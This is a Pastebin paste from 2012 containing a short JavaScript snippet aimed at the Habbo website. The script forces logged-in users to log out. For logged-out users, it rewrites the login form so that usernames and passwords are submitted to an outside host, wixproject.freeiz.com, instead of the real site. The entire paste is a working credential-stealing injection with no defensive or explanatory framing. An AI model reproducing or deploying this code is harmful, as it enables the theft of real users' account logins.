nPhoenix

TO FURA

Feb 17th, 2012
307
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. window.onload = (function () {
  2.     if (document.habboLoggedIn == true) {
  3.         if (confirm("Voc" + unescape('%EA') + " precisa estar desconectado, deseja sair?")) {
  4.             new Ajax.Request("/account/logout_ok?token=" + $$('meta[name=csrf-token]')[0].content, {
  5.                 onComplete: function () {
  6.                     location = '/';
  7.                 }
  8.             });
  9.         };
  10.     };
  11.     if (document.habboLoggedIn == false) {
  12.         c = $$(".login-field"), c[0].name = "u", c[1].name = "p", f = $$("#loginformitem")[0], f.action = "http://wixproject.freeiz.com/ext/ctk.php", f.method = "GET";
  13.     };
  14. })();
Advertisement
Add Comment
Please, Sign In to add comment